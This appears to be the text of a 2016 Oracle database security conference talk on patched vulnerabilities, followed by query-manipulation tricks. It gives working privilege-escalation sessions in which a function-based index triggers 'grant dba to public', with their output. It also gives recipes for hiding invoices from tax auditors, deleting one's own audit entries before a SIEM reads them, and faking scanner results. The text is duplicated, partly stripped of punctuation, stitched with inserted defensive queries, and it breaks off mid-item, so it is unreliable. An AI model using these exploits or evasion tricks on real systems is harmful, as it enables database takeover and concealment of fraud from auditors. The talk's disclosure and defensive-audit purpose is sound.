1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA and asks you: „Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary…“
Scenario 2
Remove your own audit entries from the audit log, which is retrieved by the SIEM solution (e.g. Splunk, QRadar, …) via JDBC.
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you will just deliver the proper results.
A lot of different wishes…
but luckily we are using Oracle
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users…
All these scenarios have in common that we have to manipulate the SQL statement.
Select value …
Oracle Data Redaction allows to mask / manipulate the selected data just for a single database user.
Possible usage: replace true/false, replace USER/ADMIN, …
The DBA can decide what will be returned.
Select value …
A typical query from security checklists/scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks…
… from table/view …
Modifying objects can be used as a man in the middle as well.
Possible approaches:
• modify views (e.g. add spare != 'DBA1' to the view dba_audit_trail): all entries of the OS user DBA1 are removed from the view. If a SIEM solution retrieves the audit data, the entries of DBA1 are not retrieved.
• create or change synonyms to „redirect“ objects
• replace a table with a view / instead-of trigger
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user = 'DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;

SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
… where x=y
where conditions can be changed using VPD
VPD: add where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide „certain“ invoices from the audit department
Select value from table/view where x=y
SQL Translation Framework (12c only) allows to replace an entire query: the user submits Query A, the SQL Translation Framework replaces Query A with Query B.
Possible Countermeasures for paranoid Auditors
• Add a random string (e.g. aksdjhiuz) to the query to avoid the SQL Translation Framework (new SQL_ID)
• Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
• Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
• Always check the object type (is it really a table?)
• Use checksums for certain database objects (especially views)
• Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
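The checks behind the countermeasure list, as an added example that is not part of the presentation: SQL to inventory Data Redaction, VPD, SQL Translation Framework and EXEMPT ACCESS POLICY, to verify that public synonyms and DUAL resolve to the expected SYS objects, and to checksum a view definition against a baseline. The object names in the IN-lists are the ones discussed above; run it as a DBA on 12c (DBMS_CRYPTO.HASH_SH256 needs 12c, EXECUTE on DBMS_CRYPTO is not granted to PUBLIC).

```sql
-- Added example (not from the presentation): inventory the Oracle features
-- that can rewrite a query or its result behind an auditor's back, plus the
-- object-level checks from the countermeasure list. Run as a DBA.

-- 0) Current schema check: the session must resolve names in its own schema
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
FROM   sys.dual;   -- fully qualified on purpose (countermeasure 3)

-- 1) Data Redaction policies (result values rewritten per user/expression)
SELECT object_owner, object_name, policy_name, expression, enable
FROM   redaction_policies;

-- 2) VPD policies (WHERE clauses appended by a policy function)
SELECT object_owner, object_name, policy_name, pf_owner, package, function, enable
FROM   dba_policies;

-- 3) SQL Translation Framework (12c): profiles, stored rewrites, and whether
--    a profile is switched on for new sessions through the init parameter
SELECT owner, profile_name FROM dba_sql_translation_profiles;
SELECT owner, profile_name, sql_text, translated_text
FROM   dba_sql_translations;
SELECT value FROM v$parameter WHERE name = 'sql_translation_profile';

-- 4) Who is exempt from VPD (the auditor wants this; nobody else should have it)
SELECT grantee FROM dba_sys_privs WHERE privilege = 'EXEMPT ACCESS POLICY';

-- 5) Synonym redirection: public synonyms for the objects an audit query
--    relies on must resolve to the SYS object of the same name
SELECT synonym_name, table_owner, table_name
FROM   dba_synonyms
WHERE  owner = 'PUBLIC'
AND    synonym_name IN ('DUAL', 'DBA_AUDIT_TRAIL', 'DBA_USERS', 'DBA_ROLE_PRIVS')
AND    (table_owner <> 'SYS' OR table_name <> synonym_name);

-- 6) Object type check: DUAL must exist exactly as the SYS table plus the
--    public synonym; any extra view or table named DUAL is a red flag
SELECT owner, object_type, status
FROM   dba_objects
WHERE  object_name = 'DUAL'
AND    NOT (owner = 'SYS'    AND object_type = 'TABLE')
AND    NOT (owner = 'PUBLIC' AND object_type = 'SYNONYM');

-- 7) Checksum of a view definition, to compare with a baseline taken on a
--    freshly patched system (e.g. the DBA_AUDIT_TRAIL view a SIEM reads)
SELECT 'DBA_AUDIT_TRAIL' AS view_name,
       RAWTOHEX(DBMS_CRYPTO.HASH(
           DBMS_METADATA.GET_DDL('VIEW', 'DBA_AUDIT_TRAIL', 'SYS'),
           DBMS_CRYPTO.HASH_SH256)) AS sha256
FROM   sys.dual;
```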
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and Auditors/Security Department should be aware of powerful Oracle features which could be used to modify application logic
Audit these features even if not in use
Trends 2017
• New hardening documents for Oracle 12.2 required (new features, new packages, …)
• Migration to 12.2
• More auditing projects
• Integration of Auditing with SIEM solutions
Q & A
Thank you
Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter: Alexander Kornbrust
Problem (Details + Exploit later…)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function based index (FBI)
Reporter: Alexander Kornbrust
July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4, connected as SYSTEM
SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE != OWNER and owner='SYS';

GRANTEE                        OWNER                          TABLE_NAME
------------------------------ ------------------------------ ------------------------------
SYSTEM                         SYS                            INCEXP
SYSTEM                         SYS                            INCFIL
SYSTEM                         SYS                            INCVID

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2    PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4    execute immediate 'grant select on sys.link$ to public';
  5    COMMIT;
  6    RETURN FOO;
  7  END;
  8  /

SQL> grant execute on getdba to public;

==> SYSTEM does not have access to the SYS.LINK$ table

SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges

==> also the execution of getdba throws an error

SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4

==> Now create an index on the table sys.incvid using a function based index

SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.

SQL> select count(*) from sys.link$;

  COUNT(*)
----------
        11

-- Oracle 12.1.0.2 (SYSTEM does no longer have INHERIT ANY PRIVILEGE)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA(1));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA(1))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1

-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;

-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
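A defender's inventory of the preconditions used in CVE-2016-3489 (INDEX privilege on a SYS table, 11.2.0.4) and CVE-2016-5604 (CREATE ANY INDEX, Cloud Control session shown earlier), added here as an example and not part of the presentation: who can build indexes on SYS/SYSTEM tables, which existing function-based indexes on those tables call a function from another schema, which PUBLIC-executable invoker-rights functions contain an autonomous transaction, and who may inherit SYS/SYSTEM privileges through the 12c INHERIT controls. Only standard DBA_ views are used; run it as a DBA.

```sql
-- Added example (not from the presentation): detection queries for the
-- function-based-index privilege escalation pattern. Run as a DBA.

-- 1) Who can build indexes on SYS/SYSTEM tables? The INDEX object privilege
--    on a SYS table (11.2.0.4 case) or CREATE ANY INDEX (WMSYS / SYSMAN_APM
--    case) is the precondition for the attack.
SELECT grantee, owner, table_name, 'INDEX object privilege' AS how
FROM   dba_tab_privs
WHERE  privilege = 'INDEX'
AND    owner IN ('SYS', 'SYSTEM')
AND    grantee <> owner
UNION ALL
SELECT grantee, NULL, NULL, 'CREATE ANY INDEX system privilege'
FROM   dba_sys_privs
WHERE  privilege = 'CREATE ANY INDEX'
AND    grantee NOT IN ('SYS', 'DBA');

-- 2) Existing function-based indexes on SYS/SYSTEM tables whose expression
--    calls a function owned by a different schema. The index-to-function
--    dependency is recorded in DBA_DEPENDENCIES, which avoids searching the
--    LONG column DBA_IND_EXPRESSIONS.COLUMN_EXPRESSION.
SELECT i.owner            AS index_owner,
       i.index_name,
       i.table_owner,
       i.table_name,
       d.referenced_owner AS function_owner,
       d.referenced_name  AS function_name,
       i.status
FROM   dba_indexes i
JOIN   dba_dependencies d
       ON  d.owner = i.owner
       AND d.name  = i.index_name
       AND d.type  = 'INDEX'
WHERE  i.index_type LIKE 'FUNCTION-BASED%'
AND    i.table_owner IN ('SYS', 'SYSTEM')
AND    d.referenced_type IN ('FUNCTION', 'PACKAGE', 'PROCEDURE')
AND    d.referenced_owner <> i.table_owner;

-- 3) Invoker-rights (AUTHID CURRENT_USER) code that PUBLIC may execute and
--    that contains an autonomous transaction: the GETDBA building block.
--    Review every hit; legitimate ones are rare outside Oracle's own schemas.
SELECT p.owner, p.object_name, p.object_type
FROM   dba_procedures p
JOIN   dba_tab_privs t
       ON  t.owner      = p.owner
       AND t.table_name = p.object_name
       AND t.privilege  = 'EXECUTE'
       AND t.grantee    = 'PUBLIC'
WHERE  p.authid = 'CURRENT_USER'
AND    p.object_type IN ('FUNCTION', 'PACKAGE')
AND    p.owner NOT IN ('SYS', 'SYSTEM')
AND    EXISTS (SELECT 1
               FROM   dba_source s
               WHERE  s.owner = p.owner
               AND    s.name  = p.object_name
               AND    UPPER(s.text) LIKE '%AUTONOMOUS_TRANSACTION%');

-- 4) 12c only: the INHERIT PRIVILEGES control that raised ORA-06598 in the
--    12.1.0.2 session above. Holders of INHERIT ANY PRIVILEGES, and anyone
--    SYS or SYSTEM has granted INHERIT PRIVILEGES to, get past that check.
SELECT grantee, privilege
FROM   dba_sys_privs
WHERE  privilege = 'INHERIT ANY PRIVILEGES';

SELECT grantee, table_name AS on_user
FROM   dba_tab_privs
WHERE  privilege = 'INHERIT PRIVILEGES'
AND    table_name IN ('SYS', 'SYSTEM');
```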
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + Supporting documents
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
• Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
• 1 OJVM (CVSS 9.1)
• 2 Kernel PDB (CVSS 6.4, 6.0)
• 3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
• 1 APEX (CVSS 6.1, remote)
• 1 RDBMS Security & SQL*Plus (CVSS 2.4)
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 SHA-512 based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA-1 based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret
Secret = 'XDB'
and the hash will be MD5(XDB:tiger)
and is stored in the spare4 column, starting with 'H:' (the H: hash)
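To see which accounts still carry the fast, unsalted H: verifier next to the T: hash, this added check (not from the presentation) parses SYS.USER$.SPARE4. It assumes the standard verifier tags S: (SHA-1, 11g), H: (MD5 digest) and T: (PBKDF2-SHA-512, 12c) in that column; H: and T: are the ones named above, S: is the 11g tag.

```sql
-- Added example (not from the presentation): which password verifiers does
-- each open user account carry? SYS.USER$.SPARE4 holds the 11g/12c verifiers
-- as 'S:...;H:...;T:...' segments (assumed standard tags); the legacy DES
-- verifier, where still generated, lives in the PASSWORD column.
-- Run as SYS (SYSDBA).
SELECT u.name,
       CASE WHEN u.password IS NOT NULL
             AND u.password NOT IN ('EXTERNAL', 'GLOBAL')
            THEN 'DES(10g) ' END ||
       CASE WHEN u.spare4 LIKE '%S:%' THEN 'SHA1(11g) ' END ||
       CASE WHEN u.spare4 LIKE '%H:%' THEN 'MD5-digest(H:) ' END ||
       CASE WHEN u.spare4 LIKE '%T:%' THEN 'PBKDF2-SHA512(T:)' END AS verifiers,
       -- accounts whose password is still exposed to a fast, unsalted hash
       CASE WHEN u.spare4 LIKE '%H:%' THEN 'REVIEW' ELSE 'OK' END AS md5_digest
FROM   sys.user$ u
WHERE  u.type#   = 1   -- 1 = user, 0 = role
AND    u.astatus = 0   -- 0 = OPEN account
ORDER BY md5_digest DESC, u.name;
```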
Oct 2016 CPU - CVE-2016-5516
